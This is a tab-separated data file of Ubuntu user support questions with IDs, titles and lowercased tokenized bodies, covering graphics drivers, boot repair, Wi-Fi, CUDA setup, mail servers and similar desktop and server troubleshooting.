348473	installed new graphic nvidia geforce gt610 with vga hdmi dvi ports	hi my pc had only vga output so i bought this card to run my pc from hdmi port . installed card : switched on pc . ubuntu started . changed monitor settings to hdmi , connected cable but black screen . the vga port on the card must have worked at this stage to boot ubuntu and allow me access to change the monitor settings removed the hdmi cable switched the cables back to vga . black screen saying no hdmi connection . could not even bring up monitor menu to change settings back to vga . the monitor then shut down completely as if it had no power.would not restart . reinstalled old card . nvidia quantro nvs 290. all ok. hdmi on monitor works find with laptop as well . the graphic card just slotted into the pci port . should there be any additional connections. ? ? ? does hdmi have to be enabled in some way . if this is a driver problem how can it be sorted without a monitor ? ? ? should i have purged the existing drivers before installation. ? ? i think there must be a set method/order to adhere to. ? ? ? please help . thanks . sorry im such a dumbo in these matters . just worried about killing my new monitor or/and the pc . been trying for hours but as drivers came with the card i will try again tomorrow on windows 7 and report back .
348474	what 's equivalent of basictex in ubuntu ?	tex live is a large distribution of latex . basictex is a subset of tex live for users who do not want to download the full tex live . is there any equivalent of basictex in ubuntu ?
348477	scheduled task with at command ( 6am )	im gon na reboot my server 6am every day , if my internet get disconnected and ddosed . does anyone have an idea how to do the command `` at '' at a specific time , and `` am '' ? thanks- my computer clock doesnt have am/pm , but i suppose linux wont understand if i write 06:00 , will it be on mornings or on evenings ? ... ... .. ( i tried this for a test : echo `` reboot '' | at 23:17pm today ) , but it says `` unknown pm '' . what should i do ? thanks
348478	remove part of file name using for loop in terminal	in terminal using for loop we can add a part before or after the file name . but if we want to remove it how do we do this ? for example we can add .old after all .txt files name using the command bellow $ for i in *.txt > do > mv $ i $ i.old > done but my question is how do we remove this .old just using the same technique ?
348481	not able to fix boot issue after insatlling ubuntu 13.04 on windows	i installed ubuntu on my machien where windows 7 is installed and also an older version of ubuntu was installed . wher i restaretd my mamchine it is nto seeing all the os on the system . boot loader got corrupted ! ! i tried to fix the boot loader using ubutntu boot-repair . this is hte paste url that i got while installing the boot-repair and i got the message that the boot-repair has completed . http : //paste.ubuntu.com/6138483 please advise on what to do .
348486	how to remove windows after installing ubuntu ?	i installed ubuntu 13.04 on my vista 64 bit machine and i thought it was going to uninstall vista but it did n't , now i have both systems . how do i get rid of vista ?
348488	screen brightness problem during installation of ubuntu 13.04 on my acer	i want to install ubuntu on my acer travelmate 5744 , i have ubuntu 13.04 in pendrive ready , it 's all good until i reach `` try ubuntu '' or `` install ubuntu '' and the screen brightness reduce to 0 i ca n't see anything , i already read some of the solutions on how to fix this but i ca n't see anything how am i suppose to write in terminal or edit grub ?
348491	backup xfce / gtk editable accelerators	looking at this page : http : //docs.xfce.org/xfce/xfce4-settings/appearance where it says ( at the bottom ) : there is no way to restore the original , default keyboard shortcut for a command . it looks like if i enabled this and changed some shortcut , i would not be able to restore to the original . is there a way to preserve these before the changes occur and restore them afterwards ? also , does someone know why is it the case they can not be restored ? is it because there 's no distinction between `` default shortcut '' and `` shortcut '' ? just wondering about the technical side of it .
348495	install php extensions on ubuntu 12.04	i want to install the latest versions of curl , php5-xmlrpc and php5-intl extensions for php 5.4 . i have the latest version of php 5.4 ( installed via ppa : ondrej/php5-oldstable ) so the default precise packages for the said extensions will not work . i know this because i tried that first and also tried packages for later versions such as 12.10 and 13.04 . question is how do i install the latest versions of this extensions and where do i get them from . any help will be appreciated .
348497	broadcom wi-fi adapter not recognized	i 'm trying to get wireless card working , conditions : ubuntu 12.04 3 sony vaio duo 13 wi-fi adapter broadcom bcm43241 ( 802.11a/b/g/n ) however , first of all $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) and $ sudo lshw -class network ( shows no result ) here 's the result for dmesg and it seems nothing indicating the network card , even though it works in dual-booted win8 fine ( no hardware problem ) . how could i make broadcom wi-fi adapter show up in lspci ? or , is there a way around to make online ? thanks in advance . ( edit1 ) responding to the first answer below , here 's my update . i have ubuntu 12.04-3 with linux kernel 3.8.0 , so the kernel brcmfmac exists . however , this command $ sudo modprobe brcmfmac does n't change the situation . in my understanding , the device must be recognized before the driver is installed as the official ( ? ) tutorial says . ( google `` ubuntu wirelesstroubleshootingguide '' as i am not allowed to put more hyperlink . ) what am i missing ?
348498	no audio input device	my ubuntu 12.04 shows no audio input device , the list of audio input devices is empty . i 've tried several solutions suggested to this issue ( editing alsa-base.conf , installing paman , pavucontrol , etc . ) , but none seems to work . also noticed this bug report from over a year ago : https : //bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/990993 does anybody know of a workaround ? i 'd like to be able to record sound with ubuntu . thanks in advance .
348508	slowdown on retroarch snes emulation when using shaders	new ubuntu installation , first time linux user . when i turn on shaders and filters on the emulators video options the games become unplayable because of slowdown.is the problem with gallium 0.4 on amd barts driver because this worked on windows with amds drivers ? hd6850 , i5 2500k so it 's not an issue of hardware not being powerful enough
348509	im a new linux user and i cant connect to my wifi network	i just downloaded linux ubuntu 12.04 and during installation i tried to connect to my wifi but it kept getting disconnected . after installation i kept getting disconnected , i know my password is completely correct i double checked . i even got connected once to my internet for like 30mins before getting disconnected when i was in my living room but i did get disconnected whilst i was still in my living room , i did try reconnecting again in my living room with no luck.i tried reseting my modem and turning off both my modem and my router with no luck .
348513	how do i enable dual boot after windows 7 reinstall with no cd ?	i downloaded and installed ubuntu via the internet . no cd was involved . after i reinstalled win 7 due to issues with it , my dual boot disappeared . i do not have the option of using live cd or whatever . my system does not have an optical drive and my current situation prevents me from getting one ( deployed military ) how can i fix ubuntu ?
348515	error : unknown filesystem - what happened ?	all the answered questions with this error seem to be partitioning ones . i was n't changing my partition at all , just copying some files . i have a boatload of movies on my little toshiba - equally partitioned with windows 7 and ubuntu 12.04 . i grabbed a usb 3.0 cable and started the move of 110 gb of files to my external harddrive ( there was only about 2.4gb available - so it was getting a little desperate ) . everything seemed to be working well . the job was only going to take the computer an hour , which i was reasonably impressed with . i walked away , came back , and the computer was shut down . i ca n't get the computer to load either os , getting the error : unknown file system i 'm starting to think that it might have been too much for the processor to send over all at once , because i do n't get the boot menu to choose which os to use . i did n't think that had anything to do with ubuntu , but i could be wrong . i 've tried a few of the methods other folks with the same error have used successfully with none of my own . i 'm running the computer through the usb drive of the ubuntu 11.4 at the moment .
348517	how to save while editing in /lightdm.conf	hi i tried disabling guest account by editing lightdm and a bug sends me to it showing low graphics . i went i to termin and undid the change i made in /lightdm.conf but do n't know how to save tbe change and exit . how do i ? i 'm pretty sure u doing the added code is all that needs tk be done , i did n't do anything else to the computer .
348518	i do n't know how to finalize my live cd install , there is always a boot error when sys reboots	i can not log into the terminal after a live cd install , i get login name and password incorrect , next question , how do i make my new ubuntu a permanent install onto my hard drive and then mount it and still format it . i read that i had to unmount it and then format the drive , i have been reading every forum and i and even more confused than i was before please help very frustrated
348520	how to install xubuntu from a hard drive instead of a dvd or a usb stick ?	i have an old computer and i want to install xubuntu 13.04 on it . the problem is it has no dvd drive ( only a cd one ) and it wo n't boot from a usb stick ( it boots from the cd-rom and/or the hdd only ) . however , there are 2 hdds , a 40 gb and a 20 gb one . facing this problem , i thought maybe i could create a usb stick installation , as usual , copy all files to the second hdd , boot the machine from this second hdd and install xubuntu on the first hdd . in other words , i would be using the second hdd as a dvd or a usb stick installation , in theory . is that possible ? if so , is it that simple , i just copy all files from the usb stick to the second hdd and boot the machine ? or do i have to do anything else ? thanks for your time .
348525	pf kernel on ssd is it worth it ( ubuntu 13.04 )	has anyone tried the pf kernel on an ssd in ubuntu ? is it going bring more performance in terms of reading and writing to ssds ?
348531	why does n't the ubiquity installer offer me to install ubuntu alongside other linux distros ?	we 've got an asus x501a laptop ( dec 2012 ) which has this uefi thing . if i boot from an usb it only offers me to wipe the entire hard disc and install the new distro , or manual partitioning which i ca n't get my head around due to this uefi thing . -- note that this question has nothing to do with that other operating system named after openings in walls . not interested in that .
348534	can not load libmpc.so.3 while makeing gcc	i want to install gcc4.8.1 in my ubuntu 12.04 system . i have installed neccssary libraries include libmpc.so.3 . but it report `` error while loading libmpc.so.3 '' while making . i 'm sure that libmpc.so.3 is located in /usr/local/lib and i have append /usr/local/lib to path .
348535	how to remove annoying magazine/book entries from ubuntu software center	whenever i try to search the ubuntu software center for apps , my results list is flooded with magazine and book entries . is it possible to remove these annoying entries ? thanks !
348539	how do i create an internet shortcut within a folder ?	i want to create an internet shortcut within a specified folder in ubuntu 12.04 . how do i do this ?
348540	why no wireless network detection after install , when trial version sucessfully detected wireless networks ?	i created a 12.04.3 lts ubuntu dvd per website instructions . i ran it on my dell inspiron m5040 laptop in `` try ubuntu '' mode and it worked well . specifically , it readily detected available wireless networks and allowed problem-free connection . in the networks pull down menu the check/toggle link for enable wireless connections appeared and worked . i could also manually toggle back and forth my keyboard fn-f2 key combo and the wireless would toggle off and on as expected . i then installed the ubuntu to the computer . everything seems to work , except , the computer now does not detect wireless networks . the pull down menu no longer has the check/toggle link for enable wireless networks . the fn-f2 key combo for toggling the wireless reception on and off does not work , it only stays off . i my initial effort was with the 64 bit version . i later tried all of the above with the 32 bit version with exactly the same results . i read another article on here about getting some proprietary support software from the wireless chip/card manufacturer ( broadcom ? ) . however , it seemed to me that if all worked well while ubuntu was booting from the trial disk , then somehow it must have been accessing all the necessary software/drivers it needed . however , i am very much a computer novice and am not certain about this leap of logic . can anybody help me ? thank you . thank you for your kind offer to help , chili555 . i figured out how to open terminal , followed your instructions , and got the following response ( quotation marks mine ) : '' 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev01 ) '' thanks again for your offer to help . i look forward to further help .
348544	x-windows inside gnu-screen	i 'm trying to find a way to do the following : i want to run a script inside screen ( gnu-screen program in linux for leaving programs running ) but in that script i need to use a program that needs x to render something using opengl and save it into an image file . is there a way to do this ? i usually run the script from ssh and leave it running . thanks
348545	during booting the following is coming `` no bootable device -- insert boot disk and press any key '' in linux latest ubuntu version	during booting the following is coming '' no bootable device -- insert boot disk and press any key '' in linux latest ubuntu version
348546	can i reinstall windows after deleting it ?	i want to install ubuntu in replace of windows . i want to know if i can go back to windows . if i decide this is not the right choice . i do not want to install ubuntu side by side .
348548	problem with partitioning when installing ubuntu 12.04	i tried to install ubuntu 12.04 and when the partition starts , it never completes . i get errors like ( ubiquity : '3660 ' gtk critical ** : gtk_widget_draw : assertion ' ! widget - > priv- all oc_needed failed ) about 25 times , then after other statements i get : ( sep 22 01:28:0 ubuntu aptdaemon : info - quitting due to inactivity ) plus a final statement similar but saying ( quitting was requested ) ` . i assume the latter was because i initiated the quit . after re-booting to windows 7 it does a disk check , but finds no errors . my machine is a dell xps , 12 gb memory , two 1.5 tb hard drives , with the c : drive with 500 to 700 gb free , depending on which of the two install tries i recorded . i have two 1.5 tb drives in my computer . neither is partitioned . windows was not hibernated ( was not even running ) and did not need chkdsk before the ubuntu install attempt . i assume windows 7 uses the entire c : primary partition , which is the entire drive space . the instructions for installing ubuntu did not mention shrinking the windows partition . during the install process i used the sliding bar to allocate 100+ gb for the ubuntu partition and clicked install now . when it started to partition the disk for the ubuntu install , it never got any further , giving me the error messages mentioned .
348549	ubuntu server 13.04 : installation step fails every time	i 'm trying to install ubuntu server 13.04 from usb on an old computer to use as a minecraft server . after configuring the partitions ( i 've tried every partitioning option , including manual with a 500mb /boot partition , a 3gb swap partition , and a ~150gb root partition ) , it always returns with an `` installation step failed '' box . i have no idea what the problem could be , and i ca n't install from cd because i do n't have a dvd drive . any help would be appreciated .
348555	fix brightness after kde uninstall	i installled a kde update first by accident and then i got kde to install after anyways i hated it and unistalled but i realise now my fn+- > dosnt control my brightness can anyone help me fix this and that long command that everyone uses to unistall kde i used to unistall but im guess before it was done it unistalled kde as the desktop manager and stopped so any help plese . the long cpmmand also dosnt help it says it connot find them ect
348558	installing cuda 5.5 on ubuntu 12.10 , but missing launcher and menu bars	i tried both deb and .run file ways but they yield the same problem . my display card is gt630m , on my laptop . after the installation , everything works but the gui is missing launcher and menu bars , only a bare desktop is displayed after login ... it seems that its not a unity configuration problem , i tried sth . like this : menu bar and launcher missing in ubuntu 13.04 but it still does n't work . for the .deb install method , i follow the steps in http : //docs.nvidia.com/cuda/cuda-getting-started-guide-for-linux/index.html # package-manager-installation ; for the .run file install method , i do the installation in the following steps , which successes on another laptop of mine , with display card gt750m and ubuntu 12.10 : add previous open source drive nouveau into blacklist : sudo vi /etc/modprobe.d/blacklist.conf add line : blacklist nouveau set init mode as text : sudo vi /etc/default/grub modify : grub_cmdline_linux_default= '' text '' # initially it is set to be `` quiet splash '' write and quit , then : sudo update-grub then restart the systerm to enter a state without gui . update linux headers : sudo apt-get install linux-headers- $ ( uname -r ) install cuda : sudo ./cuda-5.5.11_linux_64.run -- kernel-source-path /usr/src/linux-headers-3.5.0-34-generic reset grub_cmdline_linux_default in /etc/default/grub add environmental variables : sudo vi ~/.profile add lines : path= $ path : /usr/local/cuda-5.5/bin ld_library_path= $ ld_library_path : /usr/local/cuda-5.5/lib64 : /lib export path export ld_library_path write and quit , then : source .profile install opengl developer driver . to prepare for compiling the opengl code samples in the cuda sdk , we 'll have to install the opengl developer environment as well . : sudo apt-get install libxi-dev libxmu-dev libglu-dev libx11-dev freeglut3-dev try nvcc : enter the sdk routine , and make . is there someone who can help me ?
348560	dell inspiron 3421 unknown graphics in ubuntu 12.04	i have a pre-installed ubuntu 12.04 in my dell inspiron 3421 with intel and nvidia graphics card . but , in the system details the graphics card is unknown . why is that happened ?
348561	magic keyboard only works in os x snow leopard	i am dual booting snow leopard 10.6.8 and 12.04lts on a late 2009 intel imac . the keyboard has 100 % functionality in snow leopard . it has zero functionality in ubuntu ... not even at the login screen . i did the complete install using the character map . blueman is capable of seeing it , but fails to pair . sometimes ( about 50 % of the time ) , the keyboard wo n't work at the refit selection screen . to clarify , this is not the keyboard with the numpad on the right side . i am aware of the issue that presented itself with that keyboard and the numlock fn . just to make sure , i attempted pressing fn+f6 twice ... to no avail . i 'm not a ubuntu or linux regular , so the terminal commands elude me . any ideas ?
348564	postfix to send and receive mail from gmail	friends ... i have ubuntu server 12.04 on my computer and i have installed postfix to configure mail server.i want to send and receive mail from other domain like gmail and yahoo.i have already get a free domain.what should i do for this.should i have a public ip address for this .
348566	graphics issue ( again )	i previously asked a question on here about a graphics problem i was having , ubuntu wo n't load gui i figured out how to load the gui up before a solution was given to me.here 's how i got it to load the gui , in the terminal i typed sudo xorg -configure then sudo cp xorg.conf.new /etc/x11/xorg.conf then startx that got the gui loaded up , than i had to install the proper drivers for my card and it worked like a charm for awhile , but a recent update messed with my graphics and now my computer wont load the gui again and the above solution no longer works anybody got any ideas to what the problem could be now ? my computer , toshiba l75d-a7283 laptop . it has an amd radeon hd8330 graphics card
348567	how can i install ubuntu 12.04.3-desktop.iso in a pendrive if the only option given after downloading it is by burning it into a cd ?	is there any other way to download it in the pendrive without burning it into a cd ? ? i 've tried downloading it and it was not successful because it shows that i need to burn it into a f drive which is in a cd . but i would n't want that as i prefer putting it in the usb drive . please help
348571	installation failures	i used a pre-written shell script to install steam and it supplied me with libc-ubuntu.deb file . when i dpkg the deb file it says this : sudo dpkg -i libc6_2.15-0ubuntu10.2_i386.deb ( reading database ... 223764 files and directories currently installed . ) preparing to replace libc6 2.15-0ubuntu10.2 ( using libc6_2.15-0ubuntu10.2_i386.deb ) ... unpacking replacement libc6 ... dpkg : dependency problems prevent configuration of libc6 : libc6 depends on libc-bin ( = 2.15-0ubuntu10.2 ) ; however : version of libc-bin on system is 2.15-0ubuntu10.4 . dpkg : error processing libc6 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libc6 how can i install this file properly ?
348572	where to find the legitimate key-values of nautilus accelerators ?	i would like to play with the various properties that nautilus supports to be modified through ~/.config/nautilus/accels . is there a place where i can get all the supported key-value pairs ? thanks in advance !
348573	after uninstalling proprietary graphics driver , unable to properly use graphical desktop	this is a followup question to tried installing nvidia driver , now ca n't do much of anything after again trying to install the video driver and failing , i 'm here to ask for help installing a graphics driver to get ubuntu working again . i originally did this because i webgl was not supported on my current driver . and i figured while i 'm at it i 'll install it onto my other distro on the same machine . it worked fine but when i turned back to my ubuntu install , the install failed and i was forced to uninstall . now that i 've uninstalled i can not properly boot into th graphical desktop . i 've got cinnamon installed along with unity . when booting into cinnamon the desktop stays black and is unusable . when i start unity i can see my desktop and start a terminal with ctrl - alt - t but see no launcher , and no menu bars . so i tried the steps at missing launcher after 12.04 upgrade to no avail . using ccsm to try and turn on the unity desktop environment i find that i ca n't enable opengl and therefore cant enable unity . i 'd be happy to provide more relevant information , i 'm just not sure what to list . i 'd be happiest if there was a known problem with ubuntu 13.04 that had a fix for the nvidia driver and my quadro fx 880m card , like i said , it installed fine on another debian based distro . thank you .
348575	ca n't set shotwell photo viewer as default xfce4	i installed ubuntu minimal and installed xfce4 as my choice of de . after that , i installed shotwell photo manager , but i ca n't set the photo viewer as my default for images . i can right click and `` open with '' shotwell photo viewer , but when i go into properties and attempt to set shotwell as the default , i get the manager instead of the viewer . any ideas ?
348576	how do i get vlc player or gnome mplayer to run dvds i put into my computer ?	i am using lubuntu 13.04 , i installed lubuntu restricted extras back when i installed it , and it still did n't work ? i put in a few choices of dvds , she 's the man , wreck it ralph , etc . if i do get this fixed , will i be able to play bluray dvds ? i was able to on xubuntu . it could be due to my cd drive , or dvd drive not picking up on lubuntu . i 'm not sure.. thank you !
348577	installing nvidia driver on 13.04 64bit macbook pro 7,1	i 've just installed 13.04 64bit on my macbook pro 7,1 ( using the whole disk instead of dual boot ) . but after installing the nvidia driver my notebook just failed to boot . is there any workaround for this situation ?
348578	installing ubuntu first time , dell optiplex 755	i am new to computers and everything and want to try ubuntu on a desktop i just got , dell optiplex 755 . it is a bit old , i think 2007 . will the new version of ubuntu work on it . i am upgrading the computer but i am not sure if it will work with what i have . i am looking to upgrade to a new pc soon , but want to make sure i know what i am doing before i screw around on a new computer . i am most worried about ram and harddrive space , and if the graphics will work .
348579	ca n't get sweet home to start	this might be a duplicate i 'm sorry if it is . i ca n't get sweet home 3d to start up with 12.04 when i try to launch it in the terminal i get this mccuneautumn @ dorkey-gateway : ~ $ sweethome3d [ warning ] /usr/bin/sweethome3d : unable to locate /usr/lib/jvm/java-6-sun/jre/lib/javaws.jar in /usr/share/java xlib : extension `` glx '' missing on display `` :0.0 '' . java 3d error : glx extension is not supported glx version 1.3 or higher is required exception in thread `` awt-eventqueue-0 '' java.lang.nullpointerexception at com.eteks.sweethome3d.j3d.component3dmanager.getcanvas3d ( unknown source ) at com.eteks.sweethome3d.j3d.component3dmanager.getonscreencanvas3d ( unknown source ) at com.eteks.sweethome3d.swing.homecomponent3d.createcomponent3d ( unknown source ) at com.eteks.sweethome3d.swing.homecomponent3d. < init > ( unknown source ) at com.eteks.sweethome3d.swing.homecomponent3d. < init > ( unknown source ) at com.eteks.sweethome3d.swing.swingviewfactory.createview3d ( unknown source ) at com.eteks.sweethome3d.viewcontroller.homecontroller3d.getview ( unknown source ) at com.eteks.sweethome3d.swing.homepane.createactions ( unknown source ) at com.eteks.sweethome3d.swing.homepane. < init > ( unknown source ) at com.eteks.sweethome3d.swing.swingviewfactory.createhomeview ( unknown source ) at com.eteks.sweethome3d.viewcontroller.homecontroller.getview ( unknown source ) at com.eteks.sweethome3d.homeframepane. < init > ( unknown source ) at com.eteks.sweethome3d.homeframecontroller.getview ( unknown source ) at com.eteks.sweethome3d.homeframecontroller.displayview ( unknown source ) at com.eteks.sweethome3d.sweethome3d $ 2.collectionchanged ( unknown source ) at com.eteks.sweethome3d.model.collectionchangesupport.firecollectionchanged ( unknown source ) at com.eteks.sweethome3d.model.homeapplication.addhome ( unknown source ) at com.eteks.sweethome3d.sweethome3d.run ( unknown source ) at com.eteks.sweethome3d.sweethome3d $ 3.run ( unknown source ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:226 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:673 ) at java.awt.eventqueue.access $ 300 ( eventqueue.java:96 ) at java.awt.eventqueue $ 2.run ( eventqueue.java:634 ) at java.awt.eventqueue $ 2.run ( eventqueue.java:632 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.accesscontrolcontext $ 1.dointersectionprivilege ( accesscontrolcontext.java:108 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:643 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:275 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:200 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:190 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:185 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:177 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:138 ) how do i get the glx version 1.3 or higher
348580	is luks key wiped out from ram on shutdown , hibernation and suspend ?	the question is basically whether ubuntu is protected from cold boot attacks .
348581	copyagent ( copy cloud storage ) wo n't autostart at system startup ( linux/xubuntu )	copyagent ( the client from copy cloud storage ) refuses to autostart at system startup . i use xubuntu 13.04 , and even though copyagent .desktop file is in the autostart folder , it simply wo n't autostart at the beginning of every session . it has to be started manually . these are the contents of the .desktop file : [ desktop entry ] encoding=utf-8 version=1.0 type=application terminal=false startupnotify=false genericname=file synchronizer categories=network ; filetransfer ; exec=/home/johnny/copy ( install ) /x86/copyagent icon=/home/johnny/.icons/copy-root_folder.png name=copyagent comment=sync files across computers , mobile devices , and to the web x-gnome-autostart-enabled=true any ideas ? i 'm really puzzled with this one ...
348582	e : the method driver /usr/lib/apt/methods/https could not be found	i tried using sudo apt-get install apt-transport-https but it does n't work for me . sudo apt-get update e : the method driver /usr/lib/apt/methods/https could not be found . sudo apt-get install apt-transport-https reading package lists ... done building dependency tree reading state information ... done package apt-transport-https is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'apt-transport-https ' has no installation candidate my etc/apt/sources.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring main restricted deb-src http : //ubuntu.mirror.atratoip.net/ubuntu/ raring restricted universe multiverse main # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-updates main restricted deb-src http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-updates restricted main multiverse universe # added by software-properties deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring universe deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-updates universe deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring multiverse deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-updates multiverse deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-backports main restricted universe multiverse # added by software-properties deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-security main restricted deb-src http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-security restricted main multiverse universe # added by software-properties deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-security universe deb http : //ubuntu.mirror.atratoip.net/ubuntu/ raring-security multiverse # # uncomment the following two lines to add software from canonical\'s # # \'partner\ ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb http : //archive.canonical.com/ raring partner deb-src http : //archive.canonical.com/ raring partner deb-src http : //extras.ubuntu.com/ubuntu raring main
348584	how to check battery status and display it in the menu , ubuntu 12.04 lts	my question is stated in the title , i have looked around on the internet for hours and tried bunch of different methods , but none of them worked . my guess is something wrong with the acpi , although it shows in the terminal it is already installed but , if you trace into the folder , there are only two files , ( event and wakeup ) in the acpi folder , which is not normal.. any help is greatly appreciated , and this little bug is driving me crazy ! !
348585	is it possible to resize the borders in libre office calc ?	my question here is very basic-how do you resize the borders in libreoffice calc ?
348589	mail server to receive and send mail from internet	friends ... i have ubuntu server 12.04 on my computer and i have installed postfix to configure mail server.i want to send and receive mail from other domain like gmail and yahoo.i have already get a free domain.what should i do for this.should i have a public ip address for this .
348590	messed up my de by running ubuntu tweak janitor	i had upgraded my pc from ubuntu 12.04 to 13.04 ( through 12.10 ) . the system booted fine , but i felt it was a bit slow . so i ran ubuntu tweak janitor clearing old packages , config files and kernels . it also told me few packages are no longer required and i cleared them as well . but after this reboot , i am getting `` the system is running in low-graphics mode '' error . i tried removing and re-installing nvidia-current , nvidia-settings and xorg packages . but its still the same . i tried putting xorg.failsafe configuration also . i guess ubuntu tweak has removed some config or package required . can i someway re-install entire display+drivers stack ? any other packages i need to try re-install/reconfigure ?
348592	kde : register a permanent global shortcut	i am using kde and i want to : reassign global shortcut win+l to lock screen . set win+t to launch terminal . i was able to do # 1 directly changing kblobalaccel config file . but this is hack and # 2 is still unsolved . how do i do this via d-bus or pykde4 ? when i add win+l via system settings , it says that this shortcut is already assigned to a kwin action and allows me to use this shortcut anyway . so the solution should take this into account .
348593	error : `` no boot device found '' after installing the ubuntu 13.04 , using uefi in my dell inspiron se 15r 7520	i never used ubuntu before and wants to shift to this os now . but after having installed it on my inspiron se 15r 7520 , in uefi boot mode using flash drive when restart it , its showing : '' no boot device found , press any key to reboot ''
348594	how can i create and run visual basic projects and still run in windows	how can i create and run visual basic projects in ubuntu . after creating them in ubuntu would it be able to run in windows ( visual studio ) . if there is a way then plz suggest me and software for it .
348596	why doesnt unity tweak tool change my theme	i have been using unity tweak tool and i have set the theme on mac-xbuntu but after i reboot and everything it doest change the theme ? ? please help
348597	after update , i get : `` no rule to build the target '' running make , why ?	i frequently run the ubuntu updates-manager , and after that , every time , i need to do a make to re-install my tv tuner driver ( like described in here ) but that time , make stops with errors : following error messages are translated from french $ make make -c /lib/modules/3.2.0-53-generic-pae/build m= modules make [ 1 ] : entering in folder « /usr/src/linux-headers-3.2.0-53-generic-pae » make [ 2 ] : *** no rule to build the target « arch/x86/tools/relocs.c » , needed for « arch/x86/tools/relocs » . stop . make [ 1 ] : *** [ archscripts ] erreur 2 make [ 1 ] : exiting folder « /usr/src/linux-headers-3.2.0-53-generic-pae » make : *** [ all ] erreur 2 how can i solve this error please ? for information : ubuntu version is 12.04 ( precise ) kernel linux is 3.2.0-53-generic-pae content of /usr/src/linux-headers-3.2.0-53-generic/arch/x86/ is similar to /usr/src/linux-headers-3.2.0-52-generic/arch/x86/ content of folder /usr/src/linux-source-3.2.0 is $ ls -la /usr/src/linux-source-3.2.0 total 78020 drwxr-xr-x 4 root root 4096 sept. 21 08:44 . drwxr-xr-x 74 root root 4096 sept. 21 22:44 .. drwxr-xr-x 10 root root 4096 sept. 21 08:44 debian drwxr-xr-x 8 root root 4096 sept. 21 08:44 debian.master -rw-r -- r -- 1 root root 79874365 aug. 23 00:11 linux-source-3.2.0.tar.bz2 and $ find /usr/src/linux-source-3.2.0 -name `` relocs.c '' returns nothing
348601	simultaneous sound output from internal speaker and external speakers	i 'm using kubuntu 13.0.4 as well as linux mint on a compaq dc7900 sff . i have an intel core2 running at 3.16ghz and 2gb of ram . i believe i have intel hda sound , and after running hardinfo it says my hda driver and snd_hda_codec_analog are both loaded . my problem is that whenever i plug in headphones , or the line-in cable from my external speakers , the internal speakers keep playing , and the sound that is outputted is only in mono . my external speakers are 3.1 , and i believe whenever i run fedora 19 off another partition the output is fine . i have tried installing realtek drivers , but i had no success . i used a couple of terminal commands from sound from both headphones and speakers , but the files were not in the repository . so to be clear , i have downloaded the rt-linux-hdaudio-5.18 driver , but i ca n't seem to configure the driver or install it . i have also not been able to try anything with any other drivers . can anyone help me out , i am still somewhat of a newbie with linux in general . thanks .
348603	error : no such partition	i am using a dual system , windows 7 and/with ubuntu . i am trying to uninstall ubuntu before i format my computer . i deleted the sda file using terminal . after i reboot the computer , it redirects me to a blank page showing only `` error : no such partition . grub rescue > '' i tried to reboot many times but still unable to get into the bios setting . any ideas ?
348606	getting permission denied when building and running c++ files on my flash drive while using a live cd	i 'm taking a c++ class and i need to temporarily use a live cd as my regular operating system for my school work because there are serious problems with the operating system of the computer i 'm using and i ca n't install ubuntu on it because it is n't my computer . the live cd lets me store c++ files on the flash drive , but when i build and run the file , in the console window it says sh : 1 : media/lexar/c++/safest_driving_area/bin/debug/safest_driving_area : permision denied
348608	partitioning on ubuntu	i have a laptop . in said laptop i have windows 8.1 and 4 partitions . my partitions list are as follows : system partition - size:350 mb - simple driver driver c ( my windows 8.1 ) - size:150 gb - simple driver driver d - size:390 gb - simple driver driver e - size:390 gb - simple driver when i install ubuntu on my laptop , my partitions are : unknown - size : 1 mb because i install ubuntu with my flash . unknown - size : 350 mb sda1 - size : 150 gb sda2 - size : about 800 gb i want install ubuntu on driver e or d but i can not see my drive e or d and drive d and e are sda2 .
